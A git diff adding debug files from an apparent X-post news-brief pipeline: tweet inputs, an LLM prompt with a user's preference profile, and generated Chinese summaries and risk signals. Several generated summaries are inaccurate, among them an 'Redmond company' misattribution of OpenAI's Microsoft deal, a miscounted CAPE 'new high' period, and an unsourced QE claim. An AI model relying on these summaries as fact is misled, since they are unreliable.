"url": "https://x.com/GaryMarcus/status/2048593283639894520" + } + ] + }, + { + "id": "c5", + "title": "VC视角", + "subtitle": "行业方向判断", + "level": "P1", + "items": [] + }, + { + "id": "c6", + "title": "华语圈", + "subtitle": "待采集", + "level": "P2", + "items": [ + { + "text": "中文账号需X API获取,暂无可用数据", + "url": "" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "美股估值极端化", + "detail": "CAPE比率41创25年新高,超过99%历史水平,但美联储仍在QE,市场过于乐观" + }, + { + "id": "r2", + "level": "MID", + "title": "AI代理安全隐患", + "detail": "GaryMarcus指出vibe-coded AI代理频繁造成数据丢失,用户缺乏必要的技术经验" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI编程效率提升显著", + "detail": "研究人员可让GPT-5.5独立运行实验vernight,构建效率大幅提升,验证了Andrew Ng的观点" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260428_011555_l2_input.json b/data/x_brief/debug/20260428_011555_l2_input.json new file mode 100644 index 0000000..2bb4337 --- /dev/null +++ b/data/x_brief/debug/20260428_011555_l2_input.json @@ -0,0 +1,42 @@ +{ + "target_indexes": [ + 97, + 26, + 8, + 27, + 21 + ], + "target_count": 5, + "targets": [ + { + "idx": 97, + "handle": "sama", + "url": "https://x.com/sama/status/2048428561481265539", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)" + }, + { + "idx": 26, + "handle": "sama", + "url": "https://x.com/sama/status/2048755148361707946", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030." + }, + { + "idx": 8, + "handle": "AndrewYNg", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]" + }, + { + "idx": 27, + "handle": "charliebilello", + "url": "https://x.com/charliebilello/status/2048753179471323584", + "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s" + }, + { + "idx": 21, + "handle": "charliebilello", + "url": "https://x.com/charliebilello/status/2048761760971096534", + "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s" + } + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260428_011555_l2_output.json b/data/x_brief/debug/20260428_011555_l2_output.json new file mode 100644 index 0000000..928b855 --- /dev/null +++ b/data/x_brief/debug/20260428_011555_l2_output.json @@ -0,0 +1,16 @@ +{ + "target_indexes": [ + 97, + 26, + 8, + 27, + 21 + ], + "broadcast_zh": [ + "当前行业呼吁重新审视操作系统和用户界面设计逻辑,强调开发人机协同及适用于智能体的新一代互联网协议,或推动终端计算架构革新", + "Redmond公司宣布与微软续签长期战略合作,2032年前提供核心模型服务,2030年前维持收益分成,同时开放多云平台部署,强化云计算生态优势", + "AI原生研发团队组织形态出现结构性转变,代码代理工具显著提升开发效率,催生工程师向产品经理、设计师等复合型角色转型,重塑软件产业分工体系", + "标普500市盈率创23年来新高,高于历史99%时期估值水平,显示市场对科技股盈利持续能力仍存在分歧,需警惕泡沫风险", + "先稳后攻特征延续至2026年,交易者惯性减小且更具备逆向操作能力,推动市场回调修复周期明显缩短,反映资本资金结构与投资策略的深层变化" + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260429_171514_l1_stage1_input.txt b/data/x_brief/debug/20260429_171514_l1_stage1_input.txt new file mode 100644 index 0000000..c2f0128 --- /dev/null +++ b/data/x_brief/debug/20260429_171514_l1_stage1_input.txt @@ -0,0 +1,459 @@ +[meta] + +tweets=120 + +tweet_summary_chars=113228 + +phase=stage1_draft + + + +[prompt] + +你是“X资讯月报总编”。请先产出“结构草案 JSON”(阶段1),供后续阶段2定稿使用。 + +你必须遵循“用户配置文档”的偏好: +- 优先覆盖“我现在最关心的事”; +- 按“账号权重与偏好”做信息优先级排序(高权重账号更容易进入 themes/p0); +- 按“内容类型偏好(✅/❌)”进行取舍; +- 尽量贴合“简报格式偏好”的表达风格(中文总结为主,保留关键英文原句); +- 页面是固定模块位,内容应服务于前端模块整合,不要输出散乱信息。 + +阶段1输出要求(仅草案): +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 使用如下字段(严格保持键名): +{ + "headline":"今日一句话总结,<40字,点出主旋律", + "themes":[{"id":"t1","title":"...","subtitle":"...","bullets":["..."],"sample_urls":["..."]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","item_urls":["..."],"item_texts":["..."]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +4) 每个模块优先包含可验证 URL;无法确定时宁缺毋滥。 +5) 内容必须中文,简洁可执行。 +6) JSON 必须合法:双引号、无注释、无尾逗号。 + +用户配置文档(用于本次简报编排): +# 我的 X 资讯简报配置 +> 这是一份活的文档。你可以随时手动编辑,Claude 也会根据你的阅读行为自动更新行为日志和权重建议。 +> 设计参考:Karpathy 的 LLM Wiki 模式——知识预编译,随时间积累。 + +**创建日期**:2026-04-26 +**最后更新**:2026-04-29(新增 Cursor 官方账号 + 17位中文区博主;华语圈从3人扩充至20人) + +--- + +## 一、我现在最关心的事 +> 这是简报的核心过滤器。Claude 在筛选和总结推文时,会优先选出和这里相关的内容放进主题卡片。 + +- 探索 AI 工具在投资研究和期权分析中的实际应用 +- 寻找值得在 B站分享的开源项目和 AI 工具(能快速跑通、有演示效果的优先) +- 跟上 AI 编程工具的发展(Claude Code、Cursor、Agent 相关) +- 了解顶级 VC 和行业领袖对 AI 下一步方向的判断 +- 关注 A股和美股宏观叙事的变化(尤其是科技板块) + +--- + +## 二、账号权重与偏好 + +> 权重分三档:高 / 中 / 低 +> 高权重账号:内容优先进入主题卡片 +> 中权重账号:有足够价值时进入快速扫读 +> 低权重账号:仅在有明确高价值内容时出现 + +### AI 行业 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @karpathy | Andrej Karpathy | 高 | 技术深度、可操作项目、AI编程实践 | 质量极高,几乎每条都值得看 | +| @sama | Sam Altman | 高 | 行业方向、产品发布 | 信息密度高,观点有参考价值 | +| @DarioAmodei | Dario Amodei | 高 | Anthropic动向、AI安全与能力 | Anthropic CEO,和Claude直接相关 | +| @AravSrinivas | Aravind Srinivas | 高 | AI产品方向、搜索与Agent | Perplexity CEO,活跃度高 | +| @AndrewYNg | Andrew Ng | 高 | 学习资源、AI教育、应用落地 | 对理解AI应用场景有帮助 | +| @cursor_ai | Cursor | 中 | 产品更新、功能发布、Cursor生态 | 新增;AI编程工具官方账号,主线之一 | +| @ylecun | Yann LeCun | 中 | 研究方向、学术争论 | 偶尔有深度洞见,但争论性内容较多 | +| @JeffDean | Jeff Dean | 中 | 研究进展、Google AI动向 | 更新频率低,但含金量高 | +| @soumithchintala | Soumith Chintala | 中 | 开源框架、技术工具 | PyTorch相关,关注技术底层 | +| @gregbrockman | Greg Brockman | 中 | OpenAI产品动向 | 更新较少,有则关注 | +| @GaryMarcus | Gary Marcus | 低 | AI批评与反思 | 有参考价值但以质疑为主 | +| @elonmusk | Elon Musk | 低 | 偶尔有AI/科技相关 | 噪音多,仅关注有实质内容的推文 | + +### VC / 投资人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @paulg | Paul Graham | 高 | 创业思维、长文洞见 | 更新少但质量极高,每条都值得读 | +| @naval | Naval Ravikant | 高 | 思维框架、财富哲学 | 更新不频繁,但思想密度高 | +| @pmarca | Marc Andreessen | 高 | AI/科技政策、VC判断、行业叙事 | a16z联合创始人,极其活跃,2.1M粉 | +| @david_tiantian | David Tian Wang | 中 | 宏观分析、市场判断 | 账号实际发帖量约42条,活跃度一般 | +| @morganhousel | Morgan Housel | 中 | 投资心理、长期主义、行为金融 | 《Psychology of Money》作者 | +| @eladgil | Elad Gil | 中 | AI投资趋势、公司判断 | 偶有高质量行业洞见 | +| @DavidSacks | David Sacks | 中 | 科技政策、VC视角 | 观点有时偏政治,筛选后看 | +| @HarryStebbings | Harry Stebbings | 低 | VC动态 | 内容较泛,权重低 | +| @jason | Jason Calacanis | 低 | 创业生态 | 噪音较多 | + +### 宏观与交易 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @charliebilello | Charlie Bilello | 高 | 宏观数据图表、资产类别轮动 | 每天发图表分析,数据驱动;贴近A股/美股宏观叙事主线 | +| @WarriorTrading | Warrior Trading | 低 | 日内交易技术 | 偏教育/营销内容 | +| @CryptoCred | Credible Crypto | 低 | 加密趋势分析 | 加密相关,权重偏低 | +| @AltcoinBuzz | AltcoinBuzz | 低 | 币圈媒体 | 偏媒体性质,优先级低 | + +### 华语圈 + +> ✅ 以下所有账号均为英文 handle,Nitter RSS 和 xint 均可正常抓取,无需 X API 补充。 +> ⚠️ 例外:@二级炒家 仍为中文 handle,需走 X API 通道。 + +#### 华语圈 · AI 编程 / 工具(与用户核心兴趣高度重叠) + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @svwang1 | 王川(硅谷) | 高 | 科技投资观察、深度思考 | 质量高,思考密度接近英文圈顶级账号 | +| @bozhou_ai | 泊舟 | 高 | 智能体构建、提示词、AI编程实践 | 新增;AI程序员+氛围编程践行者,2.1万粉,内容实操性强 | +| @lxfater | 铁锤人 | 高 | AI工具、开源项目、创业实践 | 新增;GitHub 3万星热门项目作者,B站内容参考价值高 | +| @berryxia | Berryxia | 高 | AI工具、系统提示词、设计美学 | 新增;提示词研究深度高,和用户兴趣直接对齐 | +| @Pluvio9yte | 雪踏乌云 | 高 | 氛围编程、AI编程技巧、产品出海 | 新增;大厂开发者视角,实操经验丰富 | +| @liuliu | 刘进 | 中 | VC投资、华语科技圈 | 技术洞见高质量,但更新频率偏低 | +| @CuiMao | CuiMao | 中 | 深度学习、NVIDIA生态、ComfyUI工作流 | 新增;技术深度强,ComfyUI方向与AI工具主线相关 | +| @0xAA_Science | 0xAA | 中 | Web3教育、开源项目、AI+Web3交叉 | 新增;北大计算机博士,WTF Academy发起人,技术可信度高;偏Web3但有AI视角 | + +#### 华语圈 · 独立创作者 / 产品人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @dingyi | Ding | 中 | 独立产品、SaaS工具、产品设计 | 新增;SaasPick/TopFeed作者,全网15万粉,出海产品实战参考 | +| @GoSailGlobal | Jason Zhu | 中 | SaaS出海、AI资讯、Agent资源站 | 新增;独立开发者,搭建AI Agent聚合资源站,出海视角有参考价值 | +| @frxiaobei | 凡人小北 | 中 | AI战略咨询、AIGC商业落地 | 新增;商业+战略顾问背景,关注真实商业场景的AI落地,偏B端视角 | +| @gkxspace | 余温 | 中 | AI产品商业化、从0到1创业 | 新增;05年连续创业者,已有AI项目七位数营收,创业实战参考价值高 | +| @Stv_Lynn | Steven Lynn | 中 | 科技播客、AI社区活动 | 新增;FirstLabAI播客主持人+Crazy Saturday主办者,华语AI圈社交节点 | +| @chuxiaeth | 初夏 | 中 | AI学习分享、个人成长 | 新增;Cursor资助创作者,内容质量待观察,初设中权重 | + +#### 华语圈 · Crypto / 链上(低权重,仅关注AI交叉内容) + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @二级炒家 | 二级炒家 | 高 | A股宏观、市场判断 | 和投资主线直接相关;⚠️ 中文handle,需X API | +| @wolfyxbt | 杀破狼 | 低 | 氛围编程、链上数据、Meme币 | 新增;表达一针见血,但主线偏Meme币;仅关注AI编程相关内容 | +| @runes_leo | Leo | 低 | 比特币生态、链上量化 | 新增;AI+Crypto独立建设者,主线偏比特币生态,AI交叉内容才关注 | +| @oranges | 比特币橙子 | 低 | 比特币、AI工具(OwlClawHub) | 新增;搭建了AI智能体工具集,但主业是加密投资;仅关注AI工具相关 | +| @realNyarime | 奶昔 | 低 | eSIM技术、社区运营 | 新增;主业eSIM和奶昔社区,与简报主线相关性低;暂设低权重观察 | + +--- + +## 三、内容类型偏好 + +### ✅ 优先展示 +- **可操作的项目/工具**:有 GitHub 链接、可以立刻尝试的内容 +- **AI 编程实践**:提示词技巧、Agent 搭建、工作流分享 +- **行业方向判断**:顶级 VC 或创始人对未来的预测和押注 +- **宏观与投资叙事**:A股、美股科技板块的结构性变化 +- **中文圈独特视角**:英文圈没有的本地化洞见 + +### ❌ 降低优先级 +- 纯政治观点(和 AI/投资无关的) +- 加密货币炒作、价格预测类 +- 互相转发的无实质内容互动 +- 重复已知信息的科普 + +--- + +## 四、简报格式偏好 + +``` +📰 AI & 投资日报 · [日期] + +【30秒总览】一句话概括今日主旋律 + +━━━━━━━━━━━━━ +🔥 今日主题卡片(2~3个) +每张卡片包含: + - 主题标签 + - 核心洞见(1~2句) + - 来源账号 + - 你可以做什么(可操作建议) + +━━━━━━━━━━━━━ +⚡ 快速扫读(剩余有价值内容) + +━━━━━━━━━━━━━ +🀄 华语圈单独板块 + +━━━━━━━━━━━━━ +📌 本期可以跟着做的事 + +━━━━━━━━━━━━━ +😴 今日无新内容的账号 +``` + +**语言**:中文总结为主,保留有分量的英文原句 +**长度**:10分钟内可以读完 +**主题卡片数量**:每日 2~3 个,宁缺毋滥 + +--- + +## 五、行为日志 +> 由 Claude 根据你的互动自动追加。记录有意义的偏好信号,作为未来权重调整的依据。 + +| 日期 | 行为 | 内容摘要 | 影响 | +|------|------|----------|------| +| 2026-04-26 | 初始配置建立 | 人工设定初始权重 | — | +| 2026-04-28 | 账号列表核查优化 | Web搜索核查全部33个账号的真实性与活跃度 | 修正7处、新增5个、删除7个 | +| 2026-04-29 | 批量新增华语圈博主 | 添加Cursor官方账号 + 15位Cursor资助中文区创作者 + 1位用户自荐(@chuxiaeth) | 总账号数从33增至51;华语圈从3扩充至20;新增AI编程/工具高权重博主4个 | + +--- + +## 六、待解决的遗留问题 +> 系统尚未实现的功能,记录在此,后续迭代时参考。 + +- [ ] 账号内容类型自动分类(通用知识型 vs 项目介绍型),不同类型反馈权重不同 +- [ ] 点踩行为如何自动写回本文件并影响下次抓取权重 +- [ ] 新账号发现与加入机制(何时、如何引入新的关注对象) +- [ ] 账号沉默超过 N 天自动降权的规则实现 +- [ ] 新加入的华语圈账号经过 2 周观察后,根据实际内容质量调整权重 + +上下文(摘要): +# X平台关注列表推文汇总 + +**生成日期**: 2026-04-29T09:15:14.394459+00:00 +**数据来源**: Nitter RSS 订阅 +**时间范围**: 最近7天 +**账号总数**: 44 | **成功获取**: 37 | **推文总数**: 513 + +--- + +### ✅ @karpathy — Andrej Karpathy(2 条) + +**[2026-04-27T21:34:34+00:00]** +> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh… +[原文链接](https://x.com/karpathy/status/2048878495539843211) + +**[2026-04-22T16:00:05+00:00]** +> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built… +[原文链接](https://x.com/karpathy/status/2046982383430496444) + +--- + +### ✅ @sama — Sam Altman(20 条) + +**[2026-04-29T02:31:21+00:00]** +> R to @sama: at this point @ajambrosino is mogmogging enjoy the next few updates +[原文链接](https://x.com/sama/status/2049315574120055054) + +**[2026-04-29T02:27:13+00:00]** +> Image +[原文链接](https://x.com/sama/status/2049314532892475791) + +**[2026-04-28T21:37:05+00:00]** +> Image +[原文链接](https://x.com/sama/status/2049241518540808440) + +**[2026-04-28T21:12:19+00:00]** +> wow y'all love 5.5 we should think of something nice to do to celebrate! +[原文链接](https://x.com/sama/status/2049235284655780000) + +**[2026-04-28T05:28:43+00:00]** +> RT by @sama: Don't just reset Codex rate limits for fun, it costs money. Don't just reset Codex rate limits for fun, it costs money. ... but the vibes are good ... I have reset Codex rate limits for … +[原文链接](https://x.com/sama/status/2048997818673537399) + +**[2026-04-28T02:52:46+00:00]** +> RT by @sama: We will ship again this week. Codex has achieved escape velocity and will keep improving rapidly. +[原文链接](https://x.com/sama/status/2048958572562710550) + +**[2026-04-27T23:55:12+00:00]** +> codex with the $20 plan is a really good deal +[原文链接](https://x.com/sama/status/2048913887614115857) + +**[2026-04-27T23:42:41+00:00]** +> we love our users +[原文链接](https://x.com/sama/status/2048910739784826966) + +**[2026-04-27T13:24:26+00:00]** +> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr… +[原文链接](https://x.com/sama/status/2048755148361707946) + +**[2026-04-27T13:09:30+00:00]** +> this is so good: https://paulgraham.com/kids.html +[原文链接](https://x.com/sama/status/2048751392031203544) + +**[2026-04-27T00:05:31+00:00]** +> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful. +[原文链接](https://x.com/sama/status/2048554097985593849) + +**[2026-04-26T23:59:53+00:00]** +> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/ +[原文链接](https://x.com/sama/status/2048552677433643427) + +**[2026-04-26T15:46:41+00:00]** +> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents) +[原文链接](https://x.com/sama/status/2048428561481265539) + +**[2026-04-26T15:37:00+00:00]** +> "post-AGI, no one is going to work and the economy is going to collapse" "i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret… +[原文链接](https://x.com/sama/status/2048426122854228141) + +**[2026-04-26T02:15:19+00:00]** +> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day +[原文链接](https://x.com/sama/status/2048224374264885396) + +**[2026-04-25T22:20:08+00:00]** +> how can they write code so fast?! +[原文链接](https://x.com/sama/status/2048165186482389253) + +**[2026-04-25T22:01:18+00:00]** +> R to @sama: (and we will fix the former) +[原文链接](https://x.com/sama/status/2048160448340767038) + +**[2026-04-25T22:01:08+00:00]** +> we still get looksmaxxed on frontend a little but we IQmog hard now +[原文链接](https://x.com/sama/status/2048160404376105179) + +**[2026-04-25T15:31:08+00:00]** +> 5.5 is so earnest "little engine that could" energy +[原文链接](https://x.com/sama/status/2048062261584077149) + +**[2026-04-24T23:41:49+00:00]** +> this was a good week. proud of the team. happy building! +[原文链接](https://x.com/sama/status/2047823357635354814) + +--- + +### ✅ @DarioAmodei — Dario Amodei(0 条) + +--- + +### ✅ @AravSrinivas — Aravind Srinivas(9 条) + +**[2026-04-28T16:05:11+00:00]** +> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al… +[原文链接](https://x.com/AravSrinivas/status/2049157990604025896) + +**[2026-04-28T15:38:49+00:00]** +> R to @AravSrinivas: reddit.com/r/GeminiAI/commen… +[原文链接](https://x.com/AravSrinivas/status/2049151356985040934) + +**[2026-04-28T15:38:28+00:00]** +> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes. +[原文链接](https://x.com/AravSrinivas/status/2049151268606894310) + +**[2026-04-24T21:24:24+00:00]** +> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr… +[原文链接](https://x.com/AravSrinivas/status/2047788775468908840) + +**[2026-04-24T19:03:21+00:00]** +> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y… +[原文链接](https://x.com/AravSrinivas/status/2047753276888854595) + +**[2026-04-24T18:44:19+00:00]** +> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047748486767272243) + +**[2026-04-23T02:46:57+00:00]** +> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047145172337836139) + +**[2026-04-22T18:28:20+00:00]** +> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c… +[原文链接](https://x.com/AravSrinivas/status/2047019688920756504) + +**[2026-04-22T18:15:16+00:00]** +> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an… +[原文链接](https://x.com/AravSrinivas/status/2047016400292839808) + +--- + +### ✅ @AndrewYNg — Andrew Ng(1 条) + +**[2026-04-27T15:58:13+00:00]** +> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to… +[原文链接](https://x.com/AndrewYNg/status/2048793852702757151) + +--- + +### ✅ @cursor_ai — Cursor(7 条) + +**[2026-04-24T19:48:34+00:00]** +> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download +[原文链接](https://x.com/cursor_ai/status/2047764656165646786) + +**[2026-04-24T19:48:33+00:00]** +> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur… +[原文链接](https://x.com/cursor_ai/status/2047764651363180839) + +**[2026-04-24T19:48:33+00:00]** +> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders. +[原文链接](https://x.com/cursor_ai/status/2047764654760632725) + +**[2026-04-24T18:28:47+00:00]** +> GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%. We've partnered with OpenAI to offer it for 50% off through May 2. +[原文链接](https://x.com/cursor_ai/status/2047744579127185843) + +**[2026-04-24T18:28:47+00:00]** +> R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench +[原文链接](https://x.com/cursor_ai/status/2047744580280561948) + +**[2026-04-22T17:12:09+00:00]** +> Mention @​Cursor to kick off tasks in Slack and see updates of its work streaming in real time. Cursor uses context in the thread and broader channels to create a PR for you to review and ship. +[原文链接](https://x.com/cursor_ai/status/2047000517751288303) + +**[2026-04-22T17:12:09+00:00]** +> R to @cursor_ai: Add Cursor to Slack: http://cursor.com/api/install-slack-app +[原文链接](https://x.com/cursor_ai/status/2047000519043141766) + +--- + +### ✅ @ylecun — Yann LeCun(20 条) + +**[2026-04-28T21:36:28+00:00]** +> RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 ! As my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers: - EB-JEPA https://github… +[原文链接](https://x.com/ylecun/status/2049241361266684288) + +**[2026-04-28T01:05:42+00:00]** +> RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc In just one year, it has be… +[原文链接](https://x.com/ylecun/status/2048931628995510596) + +**[2026-04-27T21:38:46+00:00]** +> RT by @ylecun: “Calling Trump a fascist incites political violence” Here’s a compilation of Trump calling his opponents fascists +[原文链接](https://x.com/ylecun/status/2048879552022130882) + +**[2026-04-27T21:06:29+00:00]** +> RT by @ylecun: He is right +[原文链接](https://x.com/ylecun/status/2048871429681148028) + +**[2026-04-27T14:59:33+00:00]** +> RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 ye… +[原文链接](https://x.com/ylecun/status/2048779086168838610) + +**[2026-04-27T12:27:04+00:00]** +> RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the ne… +[原文链接](https://x.com/ylecun/status/2048740712556933170) + +**[2026-04-27T10:23:22+00:00]** +> RT by @ylecun: AI has had one safest technology roll-outs in history. Read that again, because it's a fact. It's used by billions with a tiny fraction of a percent of actual problems. And yet it's se… +[原文链接](https://x.com/ylecun/status/2048709585360367651) + +**[2026-04-27T06:49:24+00:00]** +> RT by @ylecun: Image +[原文链接](https://x.com/ylecun/status/2048655735412650355) + +**[2026-04-26T23:40:02+00:00]** +> RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor au… +[原文链接](https://x.com/ylecun/status/2048547683112046771) + +**[2026-04-26T19:19:22+00:00]** +> RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. The result, predictably, is… +[原文链接](https://x.com/ylecun/status/2048482084646240560) + +**[2026-04-26T18:31:11+00:00]** +> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,… +[原文链接](https://x.com/ylecun/status/2048469956627468510) + +**[2026-04-26T17:27:23+00:00]** +> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is … +[原文链接](https://x.com/ylecun/status/2048453901930660058) + +推文样本(JSON): +[{"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T09:07:13+00:00", "title": "做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来\n\n数据库现在 67,196 个项目\n\n跑了一遍分布分析,结果让我自己愣了 30 秒:\n\n- 基尼系数 0.983(破 AppStore、npm、YouTube 纪录)\n- 54.1% 的项目是 0 star——不是「少 star」,是 0\n- Top 1% 占走了 83% 的 stars\n- 2026 年 3 月单月新增 27,720 个项目,是 2024 月均的 45 倍\n\n写了一篇 1800 字英文长文讲完所有发现", "url": "https://x.com/GoSailGlobal/status/2049415194372342164"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T08:43:53+00:00", "title": "R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证", "url": "https://x.com/realNyarime/status/2049409325098238125"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T08:41:13+00:00", "title": "据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。\n\n原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。然后我和我们3个领导是最后来的。 